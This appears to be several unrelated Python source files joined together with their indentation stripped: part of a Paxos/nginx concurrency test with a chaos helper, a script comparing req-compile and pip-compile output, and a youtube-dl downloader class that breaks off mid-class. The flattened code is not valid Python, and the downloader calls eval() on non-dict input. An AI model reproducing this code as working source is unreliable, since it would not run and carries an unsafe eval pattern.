(request,('get_view',2,),ee.NoView),
(init_view,(3,(1,2,3),3), {}),
(request,('get_view',3,),{"ver":3,"key":"view","val":[g123]}),
# change_view fix unmatched versions
(request,('change_view',1,{"del":g1}),{"ver":5,"key":"view","val":[g23]}),
(request,('get_view',1,),{"ver":5,"key":"view","val":[g23]}),
(request,('get_view',2,),{"ver":5,"key":"view","val":[g23]}),
(request,('get_view',3,),{"ver":5,"key":"view","val":[g23]}),
),
)
for case in cases:
ngx_restart('123')
init_sto()
mes = case[0]
out( "" )
out( "="*7, mes )
for actions in case[1:]:
f, args, rst = actions[:3]
if len(actions) == 4:
rst_filter = actions[3]
else:
rst_filter = lambda x:x
r = f( *args ) or {}
b = r.get('body')
b = rst_filter(b)
out( "" )
out( f.__name__, args )
import pprint
pprint.pprint( rst )
pprint.pprint( b )
assert b == rst, "expect to be " +repr(rst) + " but: " +repr(b)
out( 'OK: ', )
out( r.get('status'), r.get('body') )
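# incr_worker() increments its own counter key n times through randomly
# chosen cluster members: it re-reads the current value, retries on stale
# or unfinished versions, refreshes its version on VerNotExist errors, and
# after each successful write reads the whole store and asserts that the
# sum of all counters equals ver - 1.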
def incr_worker(incr_key, idents, n):
cur_ver = 1
for i in range( n ):
for n_try in range( 1, 1024*1024 ):
randsleep( 0.3 )
to_ident = idents[ random.randint( 0, len(idents)-1 ) ]
mes = [ "key-{0}".format( incr_key ),
"incr-{i} try-{n_try}".format( i=i, n_try=n_try ),
"req to:", to_ident,
"with ver:", cur_ver,
]
try:
b = request_ex( "get", to_ident, { "key":incr_key } )
remote_ver, remote_val = b[ 'ver' ], b.get('val')
if remote_ver < cur_ver:
# unfinished commit might be seen,
continue
if remote_ver >= cur_ver:
# get might see uncommitted value. thus version might
# not be seen in future read
if remote_val == i + 1:
dd( mes, "unfinished done", "get", b )
elif remote_val != i:
dd( mes, "error: remote val is: {val}, i={i}, ver={ver}".format(val=remote_val, i=i, ver=remote_ver) )
sys.exit( 1 )
b = request_ex("set", to_ident, {"key":incr_key, "ver":cur_ver, "val":i+1})
dd( mes, "ok", "set", b )
cur_ver = b['ver']
b = request_ex( "read", to_ident, {"ver":b[ 'ver' ]} )
ver = b['ver']
vals = [ b['val'].get( x, 0 ) for x in idents ]
total = sum(vals)
dd( mes, "ver=", b['ver'], "total=", total, "vals=", *vals )
assert total == ver - 1, 'total == ver - 1: %d, %d' %( total, ver )
break
except socket.error as e:
pass
except PaxosError as e:
dd( mes, "err", e.Code, e.Message )
if e.Code == 'VerNotExist' and cur_ver < e.Message:
cur_ver = e.Message
dd( mes, 'refreshed ver to', cur_ver )
randsleep()
except Exception as e:
dd( mes, "err", repr(e) )
monkeysess = { 'enabled': True }
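# monkey() is a chaos helper: while the test session is running it picks a
# random member and toggles its nginx instance between stopped and started,
# sleeping randomly in between, to exercise failure and recovery paths.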
def monkey(sess):
if not monkeysess[ 'enabled' ]:
return
stat = dict( [ (x, True) for x in sess['idents'] ] )
while sess[ 'running' ]:
ident = sess['idents'][ random.randint( 0, len(sess['idents'])-1 ) ]
try:
if stat[ ident ]:
ngx_stop( ident )
os.write( 1, 'nginx stopped: ' + ident + '\n' )
stat[ ident ] = False
else:
ngx_start( ident )
os.write( 1, 'nginx started: ' + ident + '\n' )
stat[ ident ] = True
randsleep()
except Exception as e:
os.write( 1, repr( e ) + ' while nginx operation: ' + ident + '\n' )
def concurrency_test():
ngx_restart('123')
init_sto()
idents = [ x for x in '123' ]
nthread = 5
nincr = 500
nmonkey = 1
for ident in idents:
body = { "ver":1,
"val": {
"1":0,
"2":0,
"3":0,
"view": [ {
"1":"1",
"2":"2",
"3":"3", }, ],
}
}
request( 'phase3', ident, body )
ths = []
for ident in idents:
th = threading.Thread( target=incr_worker, args=( ident, idents, nincr ) )
th.daemon = True
th.start()
ths.append( th )
sess = { 'running':True, "idents":idents,
'locks': dict( [ (x, threading.RLock()) for x in idents ] )
}
monkeys = []
for ii in range( nmonkey ):
monkey_th = threading.Thread( target=monkey, args=( sess, ) )
monkey_th.daemon = True
monkey_th.start()
monkeys.append( monkey_th )
for th in ths:
while th.is_alive():
th.join(0.1)
sess[ 'running' ] = False
for th in monkeys:
th.join()
if __name__ == "__main__":
import it.ngxconf
it.ngxconf.make_conf(3)
integration_test()
monkeysess[ 'enabled' ] = True
concurrency_test()
monkeysess[ 'enabled' ] = False
concurrency_test()
|
compare_with_pip_compile.py
|
from __future__ import print_function
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import time
from argparse import ArgumentParser
import pkg_resources
from req_compile.utils import reqs_from_files, normalize_project_name, has_prerelease
def run_qer_compile(reqfile, index_url=None):
output_file, name = tempfile.mkstemp()
error_file, error_name = tempfile.mkstemp()
try:
subprocess.check_call([sys.executable, '-m', 'req_compile', reqfile,
'--wheel-dir', '.wheeldir', '--verbose'],
stdout=output_file, stderr=error_file)
os.lseek(output_file, 0, os.SEEK_SET)
print('\n' + os.read(output_file, 128000).decode('utf-8') + '\n', file=sys.stderr)
return name
except subprocess.CalledProcessError:
os.lseek(error_file, 0, os.SEEK_SET)
print('\n' + os.read(error_file, 128000).decode('utf-8') + '\n', file=sys.stderr)
raise
finally:
os.close(output_file)
os.close(error_file)
def run_pip_compile(reqfile, index_url=None):
output_file, name = tempfile.mkstemp()
os.close(output_file)
# '--rebuild',
subprocess.check_output([sys.executable, '-m', 'piptools', 'compile', reqfile, '-o', name])
return name
def filter_out_blacklist(req_set):
return {req for req in req_set
if req.name.lower() not in ('setuptools', 'pip', 'distutils', 'distribute', 'documenttemplate', 'cython')}
def normalize_reqs(req_set):
return {pkg_resources.Requirement.parse(str(req).replace(req.name, normalize_project_name(req.name)))
for req in req_set}
def do_qer(reqfile, results_queue):
print('Compiling with Req-Compile...')
qer_failed = False
qer_output_file = None
try:
start = time.time()
qer_output_file = run_qer_compile(reqfile)
print(' DONE qer ({} seconds)'.format(time.time() - start))
except Exception:
qer_failed = True
results_queue.append((qer_output_file, qer_failed))
def do_pip(reqfile, results_queue):
print('Compiling with pip-compile...')
pip_failed = False
pip_output_file = None
try:
start = time.time()
pip_output_file = run_pip_compile(reqfile)
print(' DONE pip ({} seconds)'.format(time.time() - start))
except Exception:
pip_failed = True
results_queue.append((pip_output_file, pip_failed))
def main():
parser = ArgumentParser()
parser.add_argument('requirements_file')
parser.add_argument('-i', '--index-url', type=str, default=None)
parsed_args = parser.parse_args()
failed = True
qer_output_file = None
pip_output_file = None
try:
qer_queue = []
qer_thread = threading.Thread(target=do_qer, args=(parsed_args.requirements_file, qer_queue))
qer_thread.start()
pip_queue = []
pip_thread = threading.Thread(target=do_pip, args=(parsed_args.requirements_file, pip_queue))
pip_thread.start()
qer_thread.join()
pip_thread.join()
qer_output_file, qer_failed = qer_queue[0]
pip_output_file, pip_failed = pip_queue[0]
if qer_failed:
if not pip_failed:
print('Req-Compile failed but pip-tools did not')
sys.exit(2)
if pip_failed:
if not qer_failed:
print('Pip-compile failed but req-compile did not')
sys.exit(3)
if not (qer_failed or pip_failed):
failed = False
qer_reqs = filter_out_blacklist(set(reqs_from_files([qer_output_file])))
pip_reqs = filter_out_blacklist(set(reqs_from_files([pip_output_file])))
qer_reqs = normalize_reqs(qer_reqs)
pip_reqs = normalize_reqs(pip_reqs)
if any(has_prerelease(req) for req in pip_reqs):
print('Skipping because pip-compile resolved a pre-release')
sys.exit(0)
if qer_reqs != pip_reqs:
print('Reqs do not match!')
qer_only = qer_reqs - pip_reqs
pip_only = pip_reqs - qer_reqs
for qer_req in set(qer_only):
print('Validating {}'.format(qer_req))
matching_pip_req = [
req for req in pip_only if req.name == qer_req.name
]
for req in matching_pip_req:
qver = pkg_resources.parse_version(next(iter(qer_req.specifier)).version)
pver = pkg_resources.parse_version(next(iter(req.specifier)).version)
print('Comparing versions {} {}'.format(qver, pver))
if qver == pver:
print('They matched, removing both')
qer_only.remove(qer_req)
pip_only.remove(req)
if qer_only or pip_only:
print('Qer only reqs: {}'.format(qer_only))
print('Pip only reqs: {}'.format(pip_only))
sys.exit(1)
else:
sys.exit(0)
except Exception as ex:
print('Failed due to: {} {}'.format(ex.__class__, ex))
finally:
if qer_output_file:
os.remove(qer_output_file)
if pip_output_file:
os.remove(pip_output_file)
if __name__ == '__main__':
main()
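# For reference: the comparison above relies on normalize_project_name() from
# req_compile.utils to make requirement names from the two lockfiles comparable.
# The sketch below illustrates PEP 503-style name normalization; it is an
# assumption about what such a helper typically does, not req_compile's actual
# implementation, and it is not used by this script.
import re

def pep503_normalize(name):
    """Lowercase and collapse runs of '-', '_' and '.' into a single '-', e.g. 'Zope.Interface' -> 'zope-interface'."""
    return re.sub(r'[-_.]+', '-', name).lower()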
|
downloader.py
|
from __future__ import unicode_literals
import os, sys
import re
import shutil
import traceback
import threading
from youtube_dl.downloader.http import HttpFD
from youtube_dl.downloader.hls import HlsFD
from youtube_dl.downloader.M3u8Downloader import FFmpegFD as FFmpegFDEx
from youtube_dl.downloader.OldM3u8Downloader import WSM3u8FD as WSM3u8FD
from youtube_dl.downloader.external import FFmpegFD
from youtube_dl.downloader.httpCrul import HttpCurl
from youtube_dl.utilsEX import (
get_top_host,
GoogleAnalytics
)
import youtube_dl
from youtube_dl.compat import (
compat_str,
)
from youtube_dl.WS_Extractor import (
YoutubeDLPatch4Single
)
from urlparse import urlparse
class downloader:
def buildOptions(self, verbose=False):
ydl_opts = {}
ydl_opts['debug_printtraffic'] = 1
ydl_opts['playlistend'] = 1
#ydl_opts['socket_timeout'] = 600
#2017.08.10
ydl_opts['source_address'] = '0.0.0.0'
ydl_opts['verbose'] = 1
ydl_opts['continuedl'] = 1
ydl_opts['nopart'] = True
ydl_opts['skip_unavailable_fragments'] = False
ydl_opts['fragment_retries'] = 10
ffmpeg_name = os.getenv('KVFfmpegPath')
if ffmpeg_name is None:
debug('get KVFfmpegPath failed')
debug('Try Get KVFfmpegPath Begin----------------------------------------------------')
if sys.platform == 'win32':
ffmpeg_name = r'DownloadRes\ffmpeg.exe' if os.path.exists(r'DownloadRes\ffmpeg.exe') else 'ffmpeg.exe'
else:
ffmpeg_name = 'ffmpeg'
try:
            # with Japanese characters in the path, os.path.join(os.path.abspath(os.curdir), ffmpeg_name) can raise an exception, so fall back to the relative path
try:
ydl_opts['ffmpeg_location'] = os.path.join(os.path.abspath(os.curdir), ffmpeg_name)
except:
ydl_opts['ffmpeg_location'] = ffmpeg_name
if not os.path.exists(ydl_opts['ffmpeg_location']):
debug('_file__Begin')
debug(__file__)
ydl_opts['ffmpeg_location'] = os.path.join(os.path.abspath(os.path.dirname(__file__)), ffmpeg_name)
debug('_file__End')
debug(ydl_opts['ffmpeg_location'])
except:
pass
debug('Try Get KVFfmpegPath End----------------------------------------------------')
else:
debug('get KVFfmpegPath:' + ffmpeg_name)
ydl_opts['ffmpeg_location'] = ffmpeg_name
return ydl_opts
def __init__(self, callback, infos):
self._callback = callback
self._imageSavePath = infos['imageSavePath']
self._infos = infos
self._cancel = False
self._subtitleFile = ''
self._downloadingFile = ''
self._ydl = YoutubeDLPatch4Single(self.buildOptions(False))
if sys.platform == 'win32':
self._GA = GoogleAnalytics( 'UA-100395100-3')
else:
self._GA = GoogleAnalytics( 'UA-100395100-4')
    # download progress callback hook
def progress_hook(self, s):
if self._cancel:
raise Exception('cancel')
if self.downloadThumbailAndIcon:
return
def safeGetValue(dict, key, default):
value = dict.get(key, default)
return value if value else default
if s['status'] == 'downloading':
downloaded_bytes = safeGetValue(s, 'downloaded_bytes', 0)
total_bytes = safeGetValue(s, 'total_bytes', 0) if ('total_bytes' in s) else safeGetValue(s, 'total_bytes_estimate', 0)
self._infos['downloadingFiles'][self._downloadingFile]['downloadedSize'] = downloaded_bytes
total_bytes = total_bytes if total_bytes else 1024 * 1024 * 1024 * 2
if total_bytes < (downloaded_bytes-1024):
print( 'total_bytes < downloaded_bytes total_bytes:%d downloaded_bytes:%d' % (total_bytes, downloaded_bytes))
total_bytes = downloaded_bytes + 50 * 1024 * 1024
self._infos['downloadingFiles'][self._downloadingFile]['fileSize'] = total_bytes
downloaded_bytes = total_bytes = 0
for item in self._infos['downloadingFiles'].values():
downloaded_bytes += safeGetValue(item, 'downloadedSize', 0)
total_bytes += safeGetValue(item, 'fileSize', 0)
msg = {
'event': 'downloading',
'fileSize': total_bytes,
'downloadedSize': downloaded_bytes,
}
if s.get('speed', None):
msg['speed'] = s['speed']
if self._callback:
self._callback(msg)
def testDownloader(self, func, info, fileName = None):
if fileName:
self.downloaderTestResult = func(info, fileName)
else:
self.downloaderTestResult = func(info)
    # the actual download
def get_suitable_downloader(self, filename, info):
params = self._ydl.params
fd = youtube_dl.downloader.get_suitable_downloader(info, {})(self._ydl, params)
if type(fd) == HttpFD:
            # if the file already exists at the target path, HttpFD was used before, so keep using it
if not os.path.exists(filename):
debug('-----------------------Test HttpCurl------------------')
hc = HttpCurl(self._ydl, params)
self.downloaderTestResult = False
t = threading.Thread(target=self.testDownloader, args=(hc.testUrl, info))
t.start()
t.join(10)
if self.downloaderTestResult:
fd = hc
if self._infos.get('speedUp', 'False') == 'True':
fd.openSpeedup()
debug('-----------------------Test HttpCurl %s------------------' % ('success' if type(fd) ==HttpCurl else 'fail'))
elif type(fd) in [FFmpegFD, HlsFD]:
if self._infos.get('url', '').find('youku') > -1 or self._infos.get('url', '').find('tudou') > -1 or \
self._infos.get('url', '').find('iview.abc.net.au')>-1:
return HlsFD(self._ydl, params)
try:
if 'http_headers' in info and info['http_headers'] and 'Accept-Encoding' in info['http_headers']:
info['http_headers'].pop('Accept-Encoding')
except:
pass
debug('-----------------------Select M3u8 Download Begin------------------')
            # if a same-named file with a .ds suffix exists at the target and is larger than 20 KB, use WSM3u8FD directly
tempFileName = '%s.ds' % filename
if os.path.exists(tempFileName) and os.path.getsize(tempFileName) > 1024 * 20:
debug('-----------------------Select M3u8 Download Use WSM3u8FD------------------')
dl = WSM3u8FD(self._ydl, params)
elif os.path.exists(filename):
debug('-----------------------Select M3u8 Download Use FFmpegFDEx------------------')
                # otherwise, if a target file without the .ds suffix exists, FFmpeg was used before
dl = FFmpegFDEx(self._ydl, params)
else:
debug('-----------------------Test WSM3u8FD------------------')
dl = WSM3u8FD(self._ydl, params)
if not dl.testUrl(filename, info):
dl = None
debug('-----------------------Test WSM3u8FD %s------------------' % ('success' if dl else 'fail'))
if not dl:
dl = FFmpegFDEx(self._ydl, params)
debug('-----------------------Select M3u8 Download End------------------')
fd = dl
debug(fd)
return fd
def _beforeDownload(self, filename, info):
debug('_download begin %s' % filename)
debug('......info......')
debug(info)
debug('......info......')
if type(filename) != compat_str:
try:
filename = unicode(filename)
except:
filename = filename.decode('utf-8')
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
return filename
def _download(self, filename, info):
filename = self._beforeDownload(filename, info)
if type(info) is not dict:
info = eval(info)
#'protocol': 'http_dash_segments',
url = self._infos.get('url', None)
host = get_top_host(url) if url else ''
for i in range(3):
try:
debug('downloader.py _download try %d' % i)
if info.has_key('fragments'):
info['protocol'] = 'http_dash_segments'
fd = self.get_suitable_downloader(filename, info)
fd.add_progress_hook(self.progress_hook)
if fd.download(filename, info):
try:
url = self._infos.get('url', None)
url = get_top_host(url) if url else ''
self._GA.send('event', 'download_success', type(fd).__name__, host)
except:
pass
break
else:
raise Exception('downloadFail')
except:
if self._cancel:
break
debug(traceback.format_exc())
if i == 2:
try:
self._GA.send('event', 'download_fail', type(fd).__name__, host)
self._GA.send('event', 'fail_detail', host, traceback.format_exc())
except:
pass
raise Exception(traceback.format_exc())
else:
threading._sleep(1)
debug('_download end')
def downloadSubtitle(self):
try:
if ('subtitleUrl' not in self._infos or self._infos.get('subtitleUrl', None) == None):
if ('subtitle_data' not in self._infos or self._infos.get('subtitle_data', None) == None):
return
self._subtitleFile = os.path.join(self._downloadtempPath, '%s.srt' % self._infos['fileNameWithoutExt'])
if os.path.exists(self._subtitleFile):
return
if 'subtitleUrl' in self._infos:
subtitleUrl = self._infos.get('subtitleUrl')
from sniffer import (
YoutubeSubtitle
)
str = YoutubeSubtitle(self._ydl).getSubtitleContent(subtitleUrl)
else:
str = self._infos['subtitle_data']
if str != '':
f = open(self._subtitleFile, 'wb')
f.write(str)
f.close()
if os.path.exists(self._subtitleFile):
msg = {
'event':'download_Subtitle',
'filePath': self._subtitleFile
}
if self._callback:
self._callback(msg)
except Exception as e:
print (e)
pass
def downloadWebSiteIcon(self, url, savePath):
if url == '':
return
debug('downloadWebSiteIcon begin')
try:
if (not re.search(r'//', url)):
url = 'http://' + url
o = urlparse(url)
fileName = os.path.join(savePath, '%s.ico' % o.netloc)
if not os.path.exists(fileName):
webpage = self._ydl.urlopen(url).read()
mobj = re.search(r'<link rel="shortcut icon"\s*href="([^\"]+)"', webpage)
faviconURL = ''
if mobj:
faviconURL = mobj.group(1)
if (not re.search(r'//', faviconURL)):
if faviconURL.find(r'/') == 0:
faviconURL = 'http://'+ o.netloc + faviconURL
else:
faviconURL = 'http://' + faviconURL
if not os.path.exists(fileName) and faviconURL != '':
info = {'url':faviconURL}
                    self._downloadSmallFile(faviconURL, fileName)
if not os.path.exists(fileName):
faviconURL = '%s://%s/favicon.ico' % (o.scheme, o.netloc)
self._downloadSmallFile(faviconURL, fileName)
if os.path.exists(fileName):
msg = {
'event':'download_icon',
'filePath': fileName
}
if self._callback:
self._callback(msg)
except:
debug(traceback.format_exc())
pass
debug('downloadWebSiteIcon end')
def downloadThumbnail(self, url, fileName):
debug('downloadThumbnail begin')
try:
            # record it here so ffmpeg can pick the thumbnail up later
self._infos['thumbnail_filename'] = fileName
if not url or url == '':
return
if not os.path.exists(fileName):
self._downloadSmallFile(url, fileName)
if os.path.exists(fileName):
msg = {
'event':'download_thumbnail',
'filePath': fileName
}
if self._callback:
self._callback(msg)
except:
debug(traceback.format_exc())
pass
debug('downloadThumbnail end')
def downloadThumbnailAndIcon(self, title):
self.downloadThumbailAndIcon = True
try:
self.downloadWebSiteIcon(self._infos.get('url'), self._infos['imageSavePath'])
thumbnailFilename = os.path.join(self._infos['imageSavePath'], '%s.jpg' % title)
self.downloadThumbnail(self._infos.get('thumbnail', ''), thumbnailFilename)
except:
pass
finally:
self.downloadThumbailAndIcon = False
def _downloadSmallFile(self, url, filename):
debug('begin _downloadSmallFile')
try:
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
for proto in ['http', 'https']:
if re.match(r'http', url):
tempUrl = url
else:
if re.match(r'://', url):
tempUrl = '%s%s' % (proto , url)
elif re.match(r'//', url):
tempUrl = '%s:%s' % (proto , url)
else:
tempUrl = '%s://%s' % (proto , url)
try:
webpage = self._ydl.urlopen(tempUrl).read()
f = open(filename, 'wb')
f.write(webpage)
f.close()
debug('end _downloadSmallFile Sucess')
break
except Exception as e:
                    if re.match(r'http', url):  # the URL already had an http prefix, so don't retry
raise e
else:
debug(e)
except Exception as e:
debug('end _downloadSmallFile fail Exception:')
debug(e)
def prepareData(self):
        # prepare the paths
downloadtempPath = self._infos.get('downloadTempPath')
if not os.path.exists(downloadtempPath):
os.makedirs(downloadtempPath)
self._downloadtempPath = downloadtempPath
        # start the download
if not self._infos.get('downloadingFiles'):
fileName = '%s.%s' % (self._infos['fileNameWithoutExt'], self._infos['ext'])
self._infos['destFileName'] = os.path.join(self._infos.get('downloadDestPath'), fileName)
downloadFiles = {}
for i, item in enumerate(self._infos['formats']):
template = '%d.%s'
fileName = os.path.join(downloadtempPath, template % (i, item['ext']))
downloadFiles[fileName] = {'downloadedSize': 0, 'fileSize': item.get('filesize', 0), 'format': item, 'order': i}
self._infos['downloadingFiles'] = downloadFiles
self._infos.pop('formats')
msg = {
'event': 'download_start',
'quality': self._infos.get('quality'),
'data': self._infos
}
if self._callback:
self._callback(msg)
def fix_dest_filename(self):
if os.path.exists(self._infos['destFileName']):
for i in range(100):
fileName = '%s(%d).%s' % (self._infos['fileNameWithoutExt'], i, self._infos['ext'])
destfileName = os.path.join(self._infos.get('downloadDestPath'), fileName)
if not os.path.exists(destfileName) or i == 99:
self._infos['destFileName'] = destfileName
break
def move_to_dest(self, source):
debug('Copy file to dest dir!')
try:
self.fix_dest_filename()
os.chdir(os.path.dirname(source))
dest = self._infos['destFileName']
os.rename(source, dest)
            # move the subtitle file as well
if os.path.exists(self._subtitleFile):
debug('Move Subtitle to Dest Begin...')
subtitle_ext = os.path.splitext(self._subtitleFile)[1]
dst_subtitle = os.path.splitext(self._infos['destFileName'])[0] + subtitle_ext
os.rename(self._subtitleFile, dst_subtitle)
debug('Move Subtitle to Dest End')
except Exception as e:
debug(e)
try:
shutil.rmtree(self._infos.get('downloadTempPath'))
except:
pass
def run(self):
try:
self.prepareData()
debug('downloadSubtitle')
self.downloadSubtitle()
debug('downloadThumbnailAndIcon')
self.downloadThumbnailAndIcon(self._infos['fileNameWithoutExt'])
            # YouTube video downloads roughly 10x faster than audio; downloading audio first feels slow to the user, so download the video first to make it feel faster
src_medias = sorted(self._infos['downloadingFiles'].iteritems(), key=lambda item: item[1]['order'])
for key, value in src_medias:
if self._cancel:
                    raise Exception('cancel')
self._downloadingFile = key
self._download(key, value['format'])
if self._cancel:
                raise Exception('cancel')
            # passed to the UI, which needs the original order
src_files = [item[0] for item in src_medias]
msg = {
'event': 'download_complete',
                'sourceFiles': src_files, # file names
'destFile': self._infos['destFileName'],
                'nextAction': self._infos.get('action', 'none'), # actions the application layer must handle after download: dash_merge (merge audio and video), multi_video_merge (concatenate segments), convert_to_mp3 (convert to mp3), none (nothing further)
'thumbnail': self._infos['thumbnail_filename'] if os.path.exists(self._infos['thumbnail_filename']) else ''
}
if os.path.exists(self._subtitleFile):
                msg['subtitle'] = self._subtitleFile
debug('------------------download complete-------------------')
debug(msg)
debug('------------------download complete-------------------')
            # on macOS, keep the old logic
if sys.platform != 'win32':
                # finished normally, no extra work needed
if self._infos.get('action', 'none') == 'none':
self.move_to_dest(self._infos['downloadingFiles'].keys()[0])
msg['destFile'] = self._infos['destFileName']
elif self._infos.get('action', 'none') in ['dash_convert']:
debug('------------------download dash_convert Begin-------------------')
self.dash_merge_WEBM()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------download dash_convert End-------------------')
elif self._infos.get('action', 'none') in ['fixM3u8']:
                    # notify the product UI first so it can update its display
if self._callback:
msg['nextAction'] = 'convert_progress'
self._callback(msg)
debug('------------------FFmpeg fixup m3u8 start-------------------')
self.fixup_m3u8()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------FFmpeg fixup m3u8 end-------------------')
            # on Windows, this layer handles the UI logic
else:
                # finished normally, no extra work needed
if self._infos.get('action', 'none') == 'none':
self.move_to_dest(self._infos['downloadingFiles'].keys()[0])
msg['destFile'] = self._infos['destFileName']
elif self._infos.get('action', 'none') in ['dash_convert', 'dash_merge']:
                    # notify the product UI first so it can update its display
if self._callback:
msg['nextAction'] = 'merge_progress' if msg['nextAction'] == 'dash_merge' else 'convert_progress'
self._callback(msg)
debug('------------------download dash_convert Begin-------------------')
self.dash_merge_WEBM()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------download dash_convert End-------------------')
                # concatenate multiple video segments
elif self._infos.get('action', 'none') in ['multi_video_merge']:
                    # notify the product UI first so it can update its display
if self._callback:
msg['nextAction'] = 'merge_progress'
self._callback(msg)
debug('------------------multi video merge start-------------------')
self.multi_video_concat()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------multi video merge end-------------------')
elif self._infos.get('action', 'none') in ['convert2Mp3']:
                    # notify the product UI first so it can update its display
if self._callback:
msg['nextAction'] = 'convert_progress'
self._callback(msg)
debug('------------------convert to mp3 start-------------------')
self.convert_to_mp3()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------convert to mp3 end-------------------')
elif self._infos.get('action', 'none') in ['fixM3u8']:
                    # notify the product UI first so it can update its display
if self._callback:
msg['nextAction'] = 'convert_progress'
self._callback(msg)
debug('------------------FFmpeg fixup m3u8 start-------------------')
self.fixup_m3u8()
msg['destFile'] = self._infos['destFileName']
msg['nextAction'] = 'none'
debug('------------------FFmpeg fixup m3u8 end-------------------')
                # if it finished normally (nextAction is 'none'), the Windows branch also collects media file info
if msg.get('nextAction', 'none') == 'none':
debug('------------------get_mediainfo start-------------------')
self.get_mediainfo(msg)
debug('------------------get_mediainfo end-------------------')
except:
if self._cancel:
msg = {
'event': 'download_cancel',
'quality': self._infos.get('quality'),
'data': self._infos
}
else:
error = traceback.format_exc()
debug(error)
msg = {
'event': 'download_error',
'error': error,
}
debug('downloader error!')
if self._callback:
self._callback(msg)
def dash_merge_WEBM(self):
try:
from youtube_dl.postprocessor import FFmpegMergerPP
merger = FFmpegMergerPP(self._ydl)
info_dict = {}
for item in self._infos['downloadingFiles'].keys():
if re.search(r'opus|vorbis|m4a', item):
audio = item
else:
video = item
            dest_filename = '%s\youtube_merger%s' % (os.path.dirname(video), os.path.splitext(video)[1])
info_dict['__files_to_merge'] = [video, audio]
info_dict['filepath'] = dest_filename
merger.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'dash_merge_WEBM', 'success', '')
except Exception as e:
self._GA.send('event', 'dash_merge_WEBM', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def multi_video_concat(self):
try:
concater = FFmpegConcatMultiVideo(self._ydl, self._infos['quality'])
info_dict = {}
            # source files
dt = sorted(self._infos['downloadingFiles'].iteritems(), key=lambda item:item[1]['order'])
src_files = [item[0] for item in dt]
info_dict['__files_to_concat'] = src_files
            # destination file
dest_filename = '%s\youtube_concat%s' % (self._downloadtempPath, os.path.splitext(self._infos['destFileName'])[1])
info_dict['destpath'] = dest_filename
concater.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'multi_video_merge', 'success', '')
except Exception as e:
self._GA.send('event', 'multi_video_merge', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def convert_to_mp3(self):
try:
converter = FFmpegExtractMp3(self._ydl, preferredquality=self._infos['quality'])
info_dict = {}
            # source file
info_dict['filepath'] = self._infos['downloadingFiles'].keys()[0]
            # destination file
dest_filename = '%s\youtube_audio%s' % (self._downloadtempPath, os.path.splitext(self._infos['destFileName'])[1])
info_dict['destpath'] = dest_filename
info_dict['filetime'] = self._infos.get('last-modified', None)
converter.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'convert_to_mp3', 'success', '')
except Exception as e:
self._GA.send('event', 'convert_to_mp3', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def fixup_m3u8(self):
try:
converter = FFmpegFixupM3u8PPForToggle(self._ydl)
info_dict = {}
            # source file
info_dict['filepath'] = self._infos['downloadingFiles'].keys()[0]
            # destination file
dest_filename = '%s\m3u8_fix%s' % (self._downloadtempPath, os.path.splitext(self._infos['destFileName'])[1])
info_dict['destpath'] = dest_filename
converter.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'fixup_m3u8', 'success', '')
except Exception as e:
self._GA.send('event', 'fixup_m3u8', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def get_mediainfo(self, msg):
filename = msg['destFile']
if not os.path.exists(filename):
return
try:
ffpp = FFmpegPostProcessor(downloader=self._ydl)
args = [ffpp.executable]
args += ['-i', filename]
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=get_startinfo())
stdout, stderr = p.communicate()
            # info retrieved (ffmpeg -i with no output file exits non-zero and prints the info to stderr)
if p.returncode != 0:
stderr = stderr.decode('utf-8', 'replace')
                # duration
m = re.search(r'Duration\:\s*((?:\d\d[.:]){3}\d\d)', stderr)
if m:
duration = m.group(1)
h, m, s = duration.strip().split(':')
msg['duration'] = int(h) * 3600 + int(m) * 60 + float(s)
                # resolution
m = re.search(r'\d{2,}x\d{2,}', stderr)
if m:
msg['resolution'] = m.group()
                # thumbnail
thumb = msg.get('thumbnail', '')
if thumb != '' and not os.path.exists(thumb):
msg['thumbnail'] = thumb
start_pos = random.uniform(5, 20)
if msg.get('duration', 0) < start_pos:
start_pos = 0;
start_pos = str(start_pos);
try:
args = [ffpp.executable]
args += ['-ss', start_pos]
args += ['-i', filename]
args += ['-f', 'image2']
args += ['-y', thumb]
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=get_startinfo())
p.communicate()
except:
msg.pop('thumbnail')
self._GA.send('event', 'get_mediainfo', 'success', '')
except Exception as e:
self._GA.send('event', 'get_mediainfo', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def delete_tempfiles(self):
if 'downloadingFiles' in self._infos:
for item in self._infos['downloadingFiles'].keys():
try:
os.remove(item)
tempfile = '%s.part' % item
if os.path.exists(tempfile):
os.remove(tempfile)
except:
pass
def cancel(self):
self._cancel = True
msg = {
'event': 'download_cancel',
'quality': self._infos.get('quality'),
'data': self._infos
}
if self._callback:
self._callback(msg)
# mp3 conversion and multi-segment merge, pulled out here to avoid modifying the ffmpeg postprocessor module itself
import time
import tempfile
import random
import subprocess
if sys.platform == 'win32':
import win_subprocess
from youtube_dl.postprocessor import FFmpegPostProcessor
from youtube_dl.postprocessor.ffmpeg import (
FFmpegPostProcessorError,
get_startinfo,
FFmpegFixupM3u8PP
)
from youtube_dl.postprocessor.common import AudioConversionError
from youtube_dl.utils import (
PostProcessingError,
)
from youtube_dl.utilsEX import debug
# multi-segment merge... ffmpeg does not accept paths containing characters like [【双语・纪实72小时】黄金炸串店_20170303【秋秋】] here, while ones like [一面湖水] are fine, so put the list file in a temp directory as a workaround
class FFmpegConcatMultiVideo(FFmpegPostProcessor):
def __init__(self, downloader=None, quality=0):
self._quality = quality
